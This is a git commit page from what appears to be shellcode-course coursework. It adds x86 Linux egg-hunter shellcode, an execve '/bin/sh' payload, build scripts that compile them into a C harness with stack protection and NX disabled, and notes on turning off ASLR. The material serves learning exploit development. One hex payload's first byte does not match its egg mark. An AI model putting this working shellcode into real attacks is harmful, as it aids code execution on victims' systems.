arno/SLAE
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

Assignment 3 - major update

Browse Source
This commit is contained in:
arno01 2013-03-28 13:20:50 +01:00
parent eaeab3e5f7
commit 85d99f6ce8
31 changed files with 1497 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
exam3/access-noloop/NOTES Normal file
View File

@ -0,0 +1,11 @@
NOTES
no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
execstack: disables Executable space protection (NX).
Or Data Execution Prevention (DEP) on Windows,
or Write XOR Execute (W^X) on BSD.
CPUs NX bit ("Never eXecute").
To disalbe Address Space Layout Randomization (ASLR) when running binary
setarch `arch` -R ./program

27
exam3/access-noloop/USAGE Normal file
View File

@ -0,0 +1,27 @@
USAGE
1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
access-noloop$ ./make.sh "HereItIs"
[I] Using custom EGG mark: HereItIs
[+] Compiling payload.nasm ...
[+] Compiling hunter.nasm ...
[+] Extracting PAYLOAD code from payload ...
[+] Adding EGG mark to PAYLOAD ...
[+] Checking PAYLOAD code for NULLs ...
[+] Extracting HUNTER code from hunter ...
[+] Checking HUNTER code for NULLs ...
[+] Compiling shellcode.c ...
-rwx------. 1 arno arno 5260 Mar 28 13:01 ./shellcode
[+] All done!
3. Run the shellcode
access-noloop$ ./shellcode
Hunter Length: 66
Payload Length: 36
sh-4.1$

87
exam3/access-noloop/hunter.nasm Normal file
View File

@ -0,0 +1,87 @@
; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program. If not, see <http://www.gnu.org/licenses/>.
;
;
; Filename: hunter.nasm *access +noloop modification
; Author: Andrey Arapov <andrey.arapov@gmail.com>
; 2013 March
;
;
section .data
egg1 equ "Egg-" ; DWORD Egg marker part1
egg2 equ "Mark" ; DWORD Egg marker part2
section .text
global _start
_start:
; function Prologue
push ebp
mov ebp, esp
; preserve registers and flags
pushad
pushfd
; Used for cmp edx, esi below
push 0xfffefff
pop esi
inc esi
xor edx, edx ; Searching the whole memory
; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
nextPage:
; cmp edx, 0xffff000
cmp edx, esi ; We don't want NULL bytes
jz Return ; Egg Hunter will go for retirement (i.e. we simply prevent forever-loop in case if there is no Egg)
or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE)
nextAddr:
inc edx ; Searching forward
; Checking if memory is accessible
push byte +0x21 ; 0x21 = 33 = __NR_access
pop eax ; EAX points to 0x21
lea ebx, [edx+0x8] ; next address to check
xor ecx, ecx ; 0: mode = F_OK
int 0x80
cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h
jz nextPage
; Searching for the Egg marker (in current page of memory which is accessible)
cmp dword [edx], egg1
jne nextAddr
cmp dword [edx+0x4], egg2
jne nextAddr
lea ecx, [edx+0x8]
jmp ecx
Return:
; restore registers and stack
popfd
popad
; function Epilogue
mov esp, ebp
pop ebp
ret

132
exam3/access-noloop/make.sh Executable file
View File

@ -0,0 +1,132 @@
#!/usr/bin/env sh
#
# USAGE
# ./make.sh [Egg-Mark]
#
# NOTE
# Egg-Mark must be a plaintext with 8 bytes in length
# If Egg-Mark was not specified, the default one will be used.
#
# To specify a custom payload, simply modify the code of payload.nasm file.
# Alternativly, you can modify PAYLOADCODE= variable down below the code.
#
ARG1=$1
if [ -z "$ARG1" ]; then
echo " [I] Argument not specified. Using default EGG mark."
ARG1="Egg-Mark";
elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
exit 1;
else
echo " [I] Using custom EGG mark: "$ARG1
fi
DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
EGGMARK=$ARG1
NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
# Uncomment to save EGGMARK in HEX
EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
# Cleanup
rm -f shellcode payload.o payload hunter.o hunter
echo " [+] Compiling payload.nasm ..."
nasm -f elf32 -o payload.o payload.nasm
ld -m elf_i386 -o payload payload.o
echo " [+] Compiling hunter.nasm ..."
nasm -f elf32 -o hunter.o hunter.nasm
ld -m elf_i386 -o hunter hunter.o
echo " [+] Extracting PAYLOAD code from payload ..."
PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
echo " [+] Adding EGG mark to PAYLOAD ..."
FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
echo " [+] Checking PAYLOAD code for NULLs ..."
if [[ $FULL_PAYLOADCODE == *00* ]]; then
echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
exit 1
fi
echo " [+] Extracting HUNTER code from hunter ..."
HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
# For debugging only
#echo ${DEFAULTEGG[0]}
#echo ${DEFAULTEGG[1]}
#echo ${NEWEGG[0]}
#echo ${NEWEGG[1]}
# Preparing Default egg to HEX form in order to replace it with a New egg
DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
# Uncomment to save new EGGMARK in HEX format
NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
# Uncomment to save new EGGMARK in Plaintext format
#NEWEGG1=$(echo -n ${NEWEGG[0]})
#NEWEGG2=$(echo -n ${NEWEGG[1]})
FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
echo " [+] Checking HUNTER code for NULLs ..."
if [[ $FULL_HUNTERCODE == *00* ]]; then
echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
exit 1
fi
# Uncomment to see what will is replaced (default egg with a new one)
#echo $DEFEGG1
#echo $DEFEGG2
#echo $NEWEGG1
#echo $NEWEGG2
#echo $HUNTERCODE
#echo $FULL_HUNTERCODE
cat > shellcode.c << EOF
#include <stdio.h>
#include <string.h>
unsigned char hunter[] = \
$FULL_HUNTERCODE;
unsigned char garbage1[] = \
"Just some garbage here...";
unsigned char payload[] = \
$FULL_PAYLOADCODE;
unsigned char garbage2[] = \
"And some garbage there...";
main()
{
printf("Hunter Length: %d\n", strlen(hunter));
printf("Payload Length: %d\n", strlen(payload));
int (*ret)() = (int(*)())hunter;
ret();
printf("NO LOOP!\n");
}
EOF
echo " [+] Compiling shellcode.c ..."
gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
# Cleanup
rm -f payload.o payload hunter.o hunter
ls -la ./shellcode
echo " [+] All done!"

44
exam3/access-noloop/payload.nasm Normal file
View File

@ -0,0 +1,44 @@
; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program. If not, see <http://www.gnu.org/licenses/>.
; Filename: payload-execve-stack.nasm
; Author: Andrey Arapov <andrey.arapov@gmail.com>
; 2013 March
global _start
section .text
_start:
; EAX
xor eax, eax
mov al, 11 ; execve syscall
; EBX
xor edx, edx
push edx ; NULL termination of '//bin/sh' string
push 0x68732f6e ; '//bin/sh' in reverse
push 0x69622f2f ; beginning of '//bin/sh' string is here
mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
; ECX
push edx ; NULL termination of a stack
push ebx ; load our '//bin/sh' on a stack
mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
; EDX
push edx ; NULL terminator
mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
int 0x80

20
exam3/access-noloop/shellcode.c Normal file
View File

@ -0,0 +1,20 @@
#include <stdio.h>
#include <string.h>
unsigned char hunter[] = "\x55\x89\xe5\x60\x9c\x68\xff\xef\xff\x0f\x5e\x46\x31\xd2\x39\xf2\x74\x2a\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x08\x31\xc9\xcd\x80\x3c\xf2\x74\xe8\x81\x3a\x48\x65\x72\x65\x75\xe9\x81\x7a\x04\x49\x74\x49\x73\x75\xe0\x8d\x4a\x08\xff\xe1\x9d\x61\x89\xec\x5d\xc3";
unsigned char garbage1[] = "Just some garbage here...";
unsigned char payload[] = "\x12\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
unsigned char garbage2[] = "And some garbage there...";
main()
{
printf("Hunter Length: %d\n", strlen(hunter));
printf("Payload Length: %d\n", strlen(payload));
int (*ret)() = (int(*)())hunter;
ret();
printf("NO LOOP!\n");
}

11
exam3/access-scasd-noloop/NOTES Normal file
View File

@ -0,0 +1,11 @@
NOTES
no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
execstack: disables Executable space protection (NX).
Or Data Execution Prevention (DEP) on Windows,
or Write XOR Execute (W^X) on BSD.
CPUs NX bit ("Never eXecute").
To disalbe Address Space Layout Randomization (ASLR) when running binary
setarch `arch` -R ./program

27
exam3/access-scasd-noloop/USAGE Normal file
View File

@ -0,0 +1,27 @@
USAGE
1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
access-scasd-noloop$ ./make.sh "HereItIs"
[I] Using custom EGG mark: HereItIs
[+] Compiling payload.nasm ...
[+] Compiling hunter.nasm ...
[+] Extracting PAYLOAD code from payload ...
[+] Adding EGG mark to PAYLOAD ...
[+] Checking PAYLOAD code for NULLs ...
[+] Extracting HUNTER code from hunter ...
[+] Checking HUNTER code for NULLs ...
[+] Compiling shellcode.c ...
-rwx------. 1 arno arno 5260 Mar 28 13:14 ./shellcode
[+] All done!
3. Run the shellcode
access-scasd-noloop$ ./shellcode
Hunter Length: 68
Payload Length: 36
sh-4.1$

92
exam3/access-scasd-noloop/hunter.nasm Normal file
View File

@ -0,0 +1,92 @@
; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program. If not, see <http://www.gnu.org/licenses/>.
;
;
; Filename: hunter.nasm *access-scasd +noloop modification
; Author: Andrey Arapov <andrey.arapov@gmail.com>
; 2013 March
;
;
section .data
egg1 equ "Egg-" ; DWORD Egg marker part1
egg2 equ "Mark" ; DWORD Egg marker part2
section .text
global _start
_start:
; function Prologue
push ebp
mov ebp, esp
; preserve registers and flags
pushad
pushfd
; Used for cmp edx, esi below
push 0xfffefff
pop esi
inc esi
cld ; clear direction flag (DF) to use scasd properly
xor edx, edx ; Searching the whole memory
; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
nextPage:
; cmp edx, 0xffff000
cmp edx, esi ; We don't want NULL bytes
jz Return ; Egg Hunter will go for retirement (i.e. we simply prevent forever-loop in case if there is no Egg)
or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE)
nextAddr:
inc edx ; Searching forward
; Checking if memory is accessible
push byte +0x21 ; 0x21 = 33 = __NR_access
pop eax ; EAX points to 0x21
lea ebx, [edx+0x4] ; address to check
xor ecx, ecx ; 0: mode = F_OK
int 0x80
cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h
jz nextPage
; Searching for the Egg marker (in current page of memory which is accessible)
mov eax, egg1
mov edi, edx
scasd ; if EAX == EDI, then sets ZF and returns EDI which has address of = edx+0x4
jnz nextAddr
mov eax, egg2
lea edi, [edx+4] ; address to check
scasd ; if EAX == EDI, then sets ZF and returns edi which has address of = edx+0x4
jnz nextAddr
jmp edi
Return:
; restore registers and stack
popfd
popad
; function Epilogue
mov esp, ebp
pop ebp
ret

132
exam3/access-scasd-noloop/make.sh Executable file
View File

@ -0,0 +1,132 @@
#!/usr/bin/env sh
#
# USAGE
# ./make.sh [Egg-Mark]
#
# NOTE
# Egg-Mark must be a plaintext with 8 bytes in length
# If Egg-Mark was not specified, the default one will be used.
#
# To specify a custom payload, simply modify the code of payload.nasm file.
# Alternativly, you can modify PAYLOADCODE= variable down below the code.
#
ARG1=$1
if [ -z "$ARG1" ]; then
echo " [I] Argument not specified. Using default EGG mark."
ARG1="Egg-Mark";
elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
exit 1;
else
echo " [I] Using custom EGG mark: "$ARG1
fi
DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
EGGMARK=$ARG1
NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
# Uncomment to save EGGMARK in HEX
EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
# Cleanup
rm -f shellcode payload.o payload hunter.o hunter
echo " [+] Compiling payload.nasm ..."
nasm -f elf32 -o payload.o payload.nasm
ld -m elf_i386 -o payload payload.o
echo " [+] Compiling hunter.nasm ..."
nasm -f elf32 -o hunter.o hunter.nasm
ld -m elf_i386 -o hunter hunter.o
echo " [+] Extracting PAYLOAD code from payload ..."
PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
echo " [+] Adding EGG mark to PAYLOAD ..."
FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
echo " [+] Checking PAYLOAD code for NULLs ..."
if [[ $FULL_PAYLOADCODE == *00* ]]; then
echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
exit 1
fi
echo " [+] Extracting HUNTER code from hunter ..."
HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
# For debugging only
#echo ${DEFAULTEGG[0]}
#echo ${DEFAULTEGG[1]}
#echo ${NEWEGG[0]}
#echo ${NEWEGG[1]}
# Preparing Default egg to HEX form in order to replace it with a New egg
DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
# Uncomment to save new EGGMARK in HEX format
NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
# Uncomment to save new EGGMARK in Plaintext format
#NEWEGG1=$(echo -n ${NEWEGG[0]})
#NEWEGG2=$(echo -n ${NEWEGG[1]})
FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
echo " [+] Checking HUNTER code for NULLs ..."
if [[ $FULL_HUNTERCODE == *00* ]]; then
echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
exit 1
fi
# Uncomment to see what will is replaced (default egg with a new one)
#echo $DEFEGG1
#echo $DEFEGG2
#echo $NEWEGG1
#echo $NEWEGG2
#echo $HUNTERCODE
#echo $FULL_HUNTERCODE
cat > shellcode.c << EOF
#include <stdio.h>
#include <string.h>
unsigned char hunter[] = \
$FULL_HUNTERCODE;
unsigned char garbage1[] = \
"Just some garbage here...";
unsigned char payload[] = \
$FULL_PAYLOADCODE;
unsigned char garbage2[] = \
"And some garbage there...";
main()
{
printf("Hunter Length: %d\n", strlen(hunter));
printf("Payload Length: %d\n", strlen(payload));
int (*ret)() = (int(*)())hunter;
ret();
printf("NO LOOP!\n");
}
EOF
echo " [+] Compiling shellcode.c ..."
gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
# Cleanup
rm -f payload.o payload hunter.o hunter
ls -la ./shellcode
echo " [+] All done!"

44
exam3/access-scasd-noloop/payload.nasm Normal file
View File

@ -0,0 +1,44 @@
; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program. If not, see <http://www.gnu.org/licenses/>.
; Filename: payload-execve-stack.nasm
; Author: Andrey Arapov <andrey.arapov@gmail.com>
; 2013 March
global _start
section .text
_start:
; EAX
xor eax, eax
mov al, 11 ; execve syscall
; EBX
xor edx, edx
push edx ; NULL termination of '//bin/sh' string
push 0x68732f6e ; '//bin/sh' in reverse
push 0x69622f2f ; beginning of '//bin/sh' string is here
mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
; ECX
push edx ; NULL termination of a stack
push ebx ; load our '//bin/sh' on a stack
mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
; EDX
push edx ; NULL terminator
mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
int 0x80

20
exam3/access-scasd-noloop/shellcode.c Normal file
View File

@ -0,0 +1,20 @@
#include <stdio.h>
#include <string.h>
unsigned char hunter[] = "\x55\x89\xe5\x60\x9c\x68\xff\xef\xff\x0f\x5e\x46\xfc\x31\xd2\x39\xf2\x74\x2b\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x04\x31\xc9\xcd\x80\x3c\xf2\x74\xe8\xb8\x48\x65\x72\x65\x89\xd7\xaf\x75\xe7\xb8\x49\x74\x49\x73\x8d\x7a\x04\xaf\x75\xdc\xff\xe7\x9d\x61\x89\xec\x5d\xc3";
unsigned char garbage1[] = "Just some garbage here...";
unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
unsigned char garbage2[] = "And some garbage there...";
main()
{
printf("Hunter Length: %d\n", strlen(hunter));
printf("Payload Length: %d\n", strlen(payload));
int (*ret)() = (int(*)())hunter;
ret();
printf("NO LOOP!\n");
}

11
exam3/access-scasd/NOTES Normal file
View File

@ -0,0 +1,11 @@
NOTES
no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
execstack: disables Executable space protection (NX).
Or Data Execution Prevention (DEP) on Windows,
or Write XOR Execute (W^X) on BSD.
CPUs NX bit ("Never eXecute").
To disalbe Address Space Layout Randomization (ASLR) when running binary
setarch `arch` -R ./program

27
exam3/access-scasd/USAGE Normal file
View File

@ -0,0 +1,27 @@
USAGE
1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
access-scasd$ ./make.sh "MyEgg123"
[I] Using custom EGG mark: MyEgg123
[+] Compiling payload.nasm ...
[+] Compiling hunter.nasm ...
[+] Extracting PAYLOAD code from payload ...
[+] Adding EGG mark to PAYLOAD ...
[+] Checking PAYLOAD code for NULLs ...
[+] Extracting HUNTER code from hunter ...
[+] Checking HUNTER code for NULLs ...
[+] Compiling shellcode.c ...
-rwx------. 1 arno arno 5132 Mar 27 23:37 ./shellcode
[+] All done!
3. Run the shellcode
access-scasd$ ./shellcode
Hunter Length: 46
Payload Length: 36
sh-4.1$

61
exam3/access-scasd/hunter.nasm Normal file
View File

@ -0,0 +1,61 @@
; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program. If not, see <http://www.gnu.org/licenses/>.
;
;
; Filename: hunter.nasm *access-scasd modification
; Author: Andrey Arapov <andrey.arapov@gmail.com>
; 2013 March
;
;
section .data
egg1 equ "Egg-" ; DWORD Egg marker part1
egg2 equ "Mark" ; DWORD Egg marker part2
section .text
global _start
_start:
cld ; clear direction flag (DF) to use scasd properly
xor edx, edx ; Searching the whole memory
; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
nextPage:
or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE)
nextAddr:
inc edx ; Searching forward
; Checking if memory is accessible
push byte +0x21 ; 0x21 = 33 = __NR_access
pop eax ; EAX points to 0x21
lea ebx, [edx+0x4] ; address to check
xor ecx, ecx ; 0: mode = F_OK
int 0x80
cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h
jz nextPage
; Searching for the Egg marker (in current page of memory which is accessible)
mov eax, egg1
mov edi, edx
scasd ; if EAX == EDI, then sets ZF and returns EDI which has address of = edx+0x4
jnz nextAddr
mov eax, egg2
lea edi, [edx+4] ; address to check
scasd ; if EAX == EDI, then sets ZF and returns edi which has address of = edx+0x4
jnz nextAddr
jmp edi

130
exam3/access-scasd/make.sh Executable file
View File

@ -0,0 +1,130 @@
#!/usr/bin/env sh
#
# USAGE
# ./make.sh [Egg-Mark]
#
# NOTE
# Egg-Mark must be a plaintext with 8 bytes in length
# If Egg-Mark was not specified, the default one will be used.
#
# To specify a custom payload, simply modify the code of payload.nasm file.
# Alternativly, you can modify PAYLOADCODE= variable down below the code.
#
ARG1=$1
if [ -z "$ARG1" ]; then
echo " [I] Argument not specified. Using default EGG mark."
ARG1="Egg-Mark";
elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
exit 1;
else
echo " [I] Using custom EGG mark: "$ARG1
fi
DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
EGGMARK=$ARG1
NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
# Uncomment to save EGGMARK in HEX
EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
# Cleanup
rm -f shellcode payload.o payload hunter.o hunter
echo " [+] Compiling payload.nasm ..."
nasm -f elf32 -o payload.o payload.nasm
ld -m elf_i386 -o payload payload.o
echo " [+] Compiling hunter.nasm ..."
nasm -f elf32 -o hunter.o hunter.nasm
ld -m elf_i386 -o hunter hunter.o
echo " [+] Extracting PAYLOAD code from payload ..."
PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
echo " [+] Adding EGG mark to PAYLOAD ..."
FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
echo " [+] Checking PAYLOAD code for NULLs ..."
if [[ $FULL_PAYLOADCODE == *00* ]]; then
echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
exit 1
fi
echo " [+] Extracting HUNTER code from hunter ..."
HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
# For debugging only
#echo ${DEFAULTEGG[0]}
#echo ${DEFAULTEGG[1]}
#echo ${NEWEGG[0]}
#echo ${NEWEGG[1]}
# Preparing Default egg to HEX form in order to replace it with a New egg
DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
# Uncomment to save new EGGMARK in HEX format
NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
# Uncomment to save new EGGMARK in Plaintext format
#NEWEGG1=$(echo -n ${NEWEGG[0]})
#NEWEGG2=$(echo -n ${NEWEGG[1]})
FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
echo " [+] Checking HUNTER code for NULLs ..."
if [[ $FULL_HUNTERCODE == *00* ]]; then
echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
exit 1
fi
# Uncomment to see what will is replaced (default egg with a new one)
#echo $DEFEGG1
#echo $DEFEGG2
#echo $NEWEGG1
#echo $NEWEGG2
#echo $HUNTERCODE
#echo $FULL_HUNTERCODE
cat > shellcode.c << EOF
#include <stdio.h>
#include <string.h>
unsigned char hunter[] = \
$FULL_HUNTERCODE;
unsigned char garbage1[] = \
"Just some garbage here...";
unsigned char payload[] = \
$FULL_PAYLOADCODE;
unsigned char garbage2[] = \
"And some garbage there...";
main()
{
printf("Hunter Length: %d\n", strlen(hunter));
printf("Payload Length: %d\n", strlen(payload));
int (*ret)() = (int(*)())hunter;
ret();
}
EOF
echo " [+] Compiling shellcode.c ..."
gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
# Cleanup
rm -f payload.o payload hunter.o hunter
ls -la ./shellcode
echo " [+] All done!"

44
exam3/access-scasd/payload.nasm Normal file
View File

@ -0,0 +1,44 @@
; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program. If not, see <http://www.gnu.org/licenses/>.
; Filename: payload-execve-stack.nasm
; Author: Andrey Arapov <andrey.arapov@gmail.com>
; 2013 March
global _start
section .text
_start:
; EAX
xor eax, eax
mov al, 11 ; execve syscall
; EBX
xor edx, edx
push edx ; NULL termination of '//bin/sh' string
push 0x68732f6e ; '//bin/sh' in reverse
push 0x69622f2f ; beginning of '//bin/sh' string is here
mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
; ECX
push edx ; NULL termination of a stack
push ebx ; load our '//bin/sh' on a stack
mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
; EDX
push edx ; NULL terminator
mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
int 0x80

18
exam3/access-scasd/shellcode.c Normal file
View File

@ -0,0 +1,18 @@
#include <stdio.h>
#include <string.h>
unsigned char hunter[] = "\xfc\x31\xd2\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x04\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x48\x65\x72\x65\x89\xd7\xaf\x75\xe7\xb8\x49\x74\x49\x73\x8d\x7a\x04\xaf\x75\xdc\xff\xe7";
unsigned char garbage1[] = "Just some garbage here...";
